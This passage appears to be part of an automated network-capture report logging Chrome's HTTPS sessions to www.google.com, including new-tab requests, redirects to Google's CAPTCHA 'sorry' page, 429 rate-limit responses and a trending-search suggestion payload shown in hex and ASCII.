                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                              Sec-Fetch-Site: none
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-05-01 23:14:16 UTC1703INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 01 May 2024 23:14:16 GMT
                                                                                                              Pragma: no-cache
                                                                                                              Expires: -1
                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-RdgwPbf5oeek1W3z0su80Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                              Permissions-Policy: unload=()
                                                                                                              Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                              Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                              Server: gws
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Accept-Ranges: none
                                                                                                              Vary: Accept-Encoding
                                                                                                              Connection: close
                                                                                                              Transfer-Encoding: chunked
                                                                                                              2024-05-01 23:14:16 UTC798INData Raw: 33 31 37 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 61 74 69 6f 6e 61 6c 20 62 6f 62 61 20 74 65 61 20 64 61 79 22 2c 22 77 61 6c 6c 79 20 67 61 74 6f 72 20 65 6d 6f 74 69 6f 6e 61 6c 20 73 75 70 70 6f 72 74 20 61 6c 6c 69 67 61 74 6f 72 22 2c 22 6a 6f 73 65 20 61 62 72 65 75 20 68 6f 75 73 74 6f 6e 20 61 73 74 72 6f 73 22 2c 22 71 75 6f 72 64 6c 65 20 68 69 6e 74 73 22 2c 22 64 65 6c 74 61 20 66 6c 69 67 68 74 20 65 6d 65 72 67 65 6e 63 79 20 73 6c 69 64 65 22 2c 22 61 73 74 72 6f 6c 6f 67 79 20 6d 6f 6e 74 68 6c 79 20 68 6f 72 6f 73 63 6f 70 65 22 2c 22 62 65 74 68 65 73 64 61 20 73 74 61 72 66 69 65 6c 64 20 75 70 64 61 74 65 22 2c 22 74 68 65 20 70 61 6e 74 68 65 6f 6e 20 64 65 73 74 69 6e 79 20 32 20 72 65 77 61 72 64 73 22 5d 2c 5b 22 22 2c 22 22 2c
                                                                                                              Data Ascii: 317)]}'["",["national boba tea day","wally gator emotional support alligator","jose abreu houston astros","quordle hints","delta flight emergency slide","astrology monthly horoscope","bethesda starfield update","the pantheon destiny 2 rewards"],["","",
                                                                                                              2024-05-01 23:14:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.549712142.250.80.1004434952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-05-01 23:14:16 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                              Host: www.google.com
                                                                                                              Connection: keep-alive
                                                                                                              Sec-Fetch-Site: none
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-05-01 23:14:17 UTC1816INHTTP/1.1 302 Found
                                                                                                              Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGMiZy7EGIjALIRIgueNKZSwbnbeM6qcssEyuGEfzvvuB8Qxn5Ug6CZQq8YZaPjdcAnDu59xiVHYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                              x-hallmonitor-challenge: CgwIyZnLsQYQ5qSXiAESBL9gluE
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                              Permissions-Policy: unload=()
                                                                                                              Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                              Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                              Date: Wed, 01 May 2024 23:14:17 GMT
                                                                                                              Server: gws
                                                                                                              Content-Length: 427
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Set-Cookie: 1P_JAR=2024-05-01-23; expires=Fri, 31-May-2024 23:14:17 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                              Set-Cookie: NID=513=Tf-UhHA6j0Gn40CeTQwHOu4zFeTkJLhfBlPDk5bGGcR4Kb5pzTU0rYWrE39l_xLo7S73wt79LGSXGivdkgpOcPbni9gYVkw4jvp33eBSf5j6rpkq_gaowB5dWImQzM2AJT53SKbhqG7FB2cYv8sWAkLnJzK_pj24yto3TtS-ShM; expires=Thu, 31-Oct-2024 23:14:16 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close
                                                                                                              2024-05-01 23:14:17 UTC427INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 25 33 46 61 73 79 6e
                                                                                                              Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.549713142.250.80.1004434952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-05-01 23:14:16 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                              Host: www.google.com
                                                                                                              Connection: keep-alive
                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-05-01 23:14:17 UTC1843INHTTP/1.1 302 Found
                                                                                                              Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGMiZy7EGIjBhRj7IuadU0gbq76nmijOz5rJlabhPhKgsZ7QxpWJU2pGaolQtvo8xHffhXVqTQ4YyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                              x-hallmonitor-challenge: CgwIyZnLsQYQyoXgigESBL9gluE
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                              Permissions-Policy: unload=()
                                                                                                              Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                              Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                              Date: Wed, 01 May 2024 23:14:17 GMT
                                                                                                              Server: gws
                                                                                                              Content-Length: 458
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Set-Cookie: 1P_JAR=2024-05-01-23; expires=Fri, 31-May-2024 23:14:17 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                              Set-Cookie: NID=513=PkDRWQ5kdfVS1tPX5bBP3XpnLJW7FpCmVL3o8ho-cuCFJpm5gc5Ec8WlwqMLokSqseFunyNZBsJQL1CpUWIS0QDEudjtKEs8TTI7vBxNtY4jqOMyvVeCgeTT0i3iQzIZO_PamnCvpfhXJTtlmJIPLQESRlfLLZLsQid4TX22s3Q; expires=Thu, 31-Oct-2024 23:14:16 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close
                                                                                                              2024-05-01 23:14:17 UTC458INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68
                                                                                                              Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.549715142.250.80.1004434952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-05-01 23:14:16 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                              Host: www.google.com
                                                                                                              Connection: keep-alive
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-05-01 23:14:17 UTC1760INHTTP/1.1 302 Found
                                                                                                              Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMiZy7EGIjA7qK4Mr9pBN6mKzvK2lTskjhTK6lIPUikSw97szio8blseDN54zxFJKYhz_ihMLFIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                              x-hallmonitor-challenge: CgsIyZnLsQYQ1Ju0ahIEv2CW4Q
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                              Permissions-Policy: unload=()
                                                                                                              Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                              Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                              Date: Wed, 01 May 2024 23:14:17 GMT
                                                                                                              Server: gws
                                                                                                              Content-Length: 417
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Set-Cookie: 1P_JAR=2024-05-01-23; expires=Fri, 31-May-2024 23:14:17 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                              Set-Cookie: NID=513=Q1QUuPoP5fiffsxnHX7HU6RtQBqmxviW_6ILXd3jNP98QQJCtzR2tDO3F5Bby44iwt6_E-RtM3O0KyBD8u8pVVmpfkL9O1UQZs-wW6FMNXT1Xn-HjQtRaldRTuZ5l3PDmgoOX2iKCv2sE_S80s-0l_WPRIMsOB_cq-G9-m46R4o; expires=Thu, 31-Oct-2024 23:14:16 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close
                                                                                                              2024-05-01 23:14:17 UTC417INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26
                                                                                                              Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.549718142.250.80.1004434952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-05-01 23:14:22 UTC920OUTGET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGMiZy7EGIjBhRj7IuadU0gbq76nmijOz5rJlabhPhKgsZ7QxpWJU2pGaolQtvo8xHffhXVqTQ4YyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                              Host: www.google.com
                                                                                                              Connection: keep-alive
                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              Cookie: 1P_JAR=2024-05-01-23; NID=513=Q1QUuPoP5fiffsxnHX7HU6RtQBqmxviW_6ILXd3jNP98QQJCtzR2tDO3F5Bby44iwt6_E-RtM3O0KyBD8u8pVVmpfkL9O1UQZs-wW6FMNXT1Xn-HjQtRaldRTuZ5l3PDmgoOX2iKCv2sE_S80s-0l_WPRIMsOB_cq-G9-m46R4o
                                                                                                              2024-05-01 23:14:22 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                              Date: Wed, 01 May 2024 23:14:22 GMT
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Content-Type: text/html
                                                                                                              Server: HTTP server (unknown)
                                                                                                              Content-Length: 3185
                                                                                                              X-XSS-Protection: 0
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close
                                                                                                              2024-05-01 23:14:22 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79
                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
                                                                                                              2024-05-01 23:14:22 UTC1255INData Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 54 54 43 62 39 74 42 43 76
                                                                                                              Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="TTCb9tBCv
                                                                                                              2024-05-01 23:14:22 UTC1031INData Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74
                                                                                                              Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.549719142.250.80.1004434952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-05-01 23:14:22 UTC738OUTGET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMiZy7EGIjA7qK4Mr9pBN6mKzvK2lTskjhTK6lIPUikSw97szio8blseDN54zxFJKYhz_ihMLFIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                              Host: www.google.com
                                                                                                              Connection: keep-alive
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              Cookie: 1P_JAR=2024-05-01-23; NID=513=Q1QUuPoP5fiffsxnHX7HU6RtQBqmxviW_6ILXd3jNP98QQJCtzR2tDO3F5Bby44iwt6_E-RtM3O0KyBD8u8pVVmpfkL9O1UQZs-wW6FMNXT1Xn-HjQtRaldRTuZ5l3PDmgoOX2iKCv2sE_S80s-0l_WPRIMsOB_cq-G9-m46R4o
                                                                                                              2024-05-01 23:14:22 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                              Date: Wed, 01 May 2024 23:14:22 GMT
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Content-Type: text/html
                                                                                                              Server: HTTP server (unknown)
                                                                                                              Content-Length: 3113
                                                                                                              X-XSS-Protection: 0
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close
